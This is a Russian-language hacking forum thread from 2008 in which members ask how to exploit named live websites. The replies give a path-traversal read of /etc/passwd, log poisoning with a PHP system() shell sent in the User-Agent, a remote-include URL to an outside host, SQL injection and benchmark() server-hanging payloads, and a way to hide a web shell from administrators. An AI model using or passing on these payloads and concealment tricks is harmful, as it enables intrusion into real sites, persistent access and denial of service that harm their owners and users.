Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. KIR@PRO

    KIR@PRO from Exception

    Joined:
    26 Dec 2007
    Messages:
    826
    Likes Received:
    291
    Reputations:
    359
    На кой мне XSS я их итак тама сотними понаходил..... я же сказал мне надо сделать sql-inject
     
    _________________________
  2. KIR@PRO

    KIR@PRO from Exception

    Joined:
    26 Dec 2007
    Messages:
    826
    Likes Received:
    291
    Reputations:
    359
    темболее это именна та которую самой первой нашел после 5 минут на сайте.... я ж написал подскажите проявите себя нужна sql-инъекция
     
    _________________________
    1 person likes this.
  3. tusman

    tusman Elder - Старейшина

    Joined:
    2 Jun 2007
    Messages:
    6
    Likes Received:
    26
    Reputations:
    -26
    Народ как использовать данные уязвимости -
    http://www.planeta.ua/fc/template.php?filename=../../../../../../../../../../../../../../../../../etc/passwd
    Если можно то по подробней пожалуйста !
    Спасибо !
     
    1 person likes this.
  4. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,674
    Likes Received:
    1,029
    Reputations:
    1,228
    там кодес типа
    PHP:
    ...
    include(
    $_GET['filename']);
    ...
    посему те надо наследить в логах (например с юзер-агентом <? system($_GET[cmd]);?> ) и потом их проинклудить

    удалённый инклуд не катит ибо так настроен сервер
    http://www.planeta.ua/fc/template.php?filename=http://toxa.nov.ru/z.txt
     
    _________________________
  5. tusman

    tusman Elder - Старейшина

    Joined:
    2 Jun 2007
    Messages:
    6
    Likes Received:
    26
    Reputations:
    -26
    можно по подробней пожалуйста ! или где об этом можно почитать ?
     
  6. noneim

    noneim New Member

    Joined:
    28 Nov 2007
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Code:
    http://www.2016usgirlsjunior.org/questions/faqs/handicap_answer.asp?FAQidx=15'+GROUP+BY+1--
    Вот эта инъёкция какая то странная... никак не могу врубится, почему не работают union, group by, и т.п., хотя через ; запросы выполняются
     
  7. darky

    darky ♠ ♦ ♣ ♥

    Joined:
    18 May 2006
    Messages:
    1,773
    Likes Received:
    825
    Reputations:
    1,418
    неправда, селект работает
     
  8. fervex

    fervex New Member

    Joined:
    12 Nov 2007
    Messages:
    25
    Likes Received:
    1
    Reputations:
    0
    Здравствуйте! :)

    Подскажите, как можно закодировать .php файл с шеллом, чтобы сервер его исполнял, а админ не смог бы найти по названию функций и прочему тексту этот файл через поиск файлов в каталоге.

    желательно, чтобы по словам
    Code:
    eval(gzinflate(base64_decode('
    он тоже не нашел этот файл.

    Linux, Apache2
    софт типа Zend Optimiser не стоит.

    Спасибо! :)
     
    #708 fervex, 17 Jan 2008
    Last edited: 17 Jan 2008
  9. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,674
    Likes Received:
    1,029
    Reputations:
    1,228
    собираешь код
    в переменную в несколько этапов, разбросанных под коду и пропускаешь через preg_replace с модификатором e
     
    _________________________
  10. KIR@PRO

    KIR@PRO from Exception

    Joined:
    26 Dec 2007
    Messages:
    826
    Likes Received:
    291
    Reputations:
    359
    пчочему то ругается на union просто на select и тому подобное...

    http://shop.winm.ru/index.php?productID=262'

    этот магазин не работает уже 2 года а сайт остался... я на нем тренируюсь он дырявый xss я нашел много теперь нашел ошибку в sql но немогу ее использовать...

    Причем как то странно LIMIT работает: ( http://shop.winm.ru/index.php?productID=353+or+15+limit+3 ) а вот остально нет...

    и еще один вопросик phpbb можно взломать не зарегистрировавшись??? а то тоже для жксперементов нашел не администрируемый и мертвый форум последнее обновление в 2005 г и там регистрация только с подтверждения админа... можно его както взломать?

    могу адрес дать....
     
    _________________________
    #710 KIR@PRO, 17 Jan 2008
    Last edited: 17 Jan 2008
  11. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,674
    Likes Received:
    1,029
    Reputations:
    1,228
    мускуль 3 ветки
     
    _________________________
    1 person likes this.
  12. KIR@PRO

    KIR@PRO from Exception

    Joined:
    26 Dec 2007
    Messages:
    826
    Likes Received:
    291
    Reputations:
    359
    я тебя немного не понял можешь обьяснить..... я понял то что нет инъекции но на будующее что значит в 3 ветки?
     
    _________________________
  13. Basurman

    Basurman Elder - Старейшина

    Joined:
    10 Nov 2006
    Messages:
    363
    Likes Received:
    271
    Reputations:
    29
    в 3-ей ветке нет оператора union
    можешь benchmark использовать...

    http://localhost/test.php?id=1-benchmark(1000000,benchamrk(1000000, md5(current_time))), или

    http://localhost/test2.php?order=(benchmark(1000000,benchamrk(1000000, md5(current_time))))

    Тупо вешает сервак (работает на 3-ке)
     
    #713 Basurman, 17 Jan 2008
    Last edited: 26 Jan 2008
    1 person likes this.
  14. KIR@PRO

    KIR@PRO from Exception

    Joined:
    26 Dec 2007
    Messages:
    826
    Likes Received:
    291
    Reputations:
    359

    это как??? в первый раз слышу мне аж стыдно стало.... :(

    обьясни пожайлуста...

    я имею ввиду как benchmark использовать.... :confused: или ссылку дай где прочитать мона.... эсли не затруднит....
     
    _________________________
    #714 KIR@PRO, 17 Jan 2008
    Last edited: 17 Jan 2008
  15. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,674
    Likes Received:
    1,029
    Reputations:
    1,228
    нуну, там ещё как бы подзапросов нет =\
     
    _________________________
    1 person likes this.
  16. KIR@PRO

    KIR@PRO from Exception

    Joined:
    26 Dec 2007
    Messages:
    826
    Likes Received:
    291
    Reputations:
    359
    тоесть вообще ни как нельзя провести иньекцию???? :eek:
     
    _________________________
  17. krypt3r

    krypt3r Elder - Старейшина

    Joined:
    27 Apr 2007
    Messages:
    1,507
    Likes Received:
    389
    Reputations:
    101
    KIR@PRO, ознакомтесь
    Code:
    http://www.securitylab.ru/contest/212101.php
     
  18. it's my

    it's my Banned

    Joined:
    29 Sep 2007
    Messages:
    335
    Likes Received:
    347
    Reputations:
    36
    чего это такое?

    hip-hop.ru/forum/ban.php?by=order%20by%201--

     
    #718 it's my, 17 Jan 2008
    Last edited: 17 Jan 2008
  19. Macro

    Macro Elder - Старейшина

    Joined:
    11 Nov 2006
    Messages:
    552
    Likes Received:
    298
    Reputations:
    207
    А это слепая инъекция
     
  20. it's my

    it's my Banned

    Joined:
    29 Sep 2007
    Messages:
    335
    Likes Received:
    347
    Reputations:
    36
    мну эта еще не проходил, дай мануал/статью
     
Thread Status:
Not open for further replies.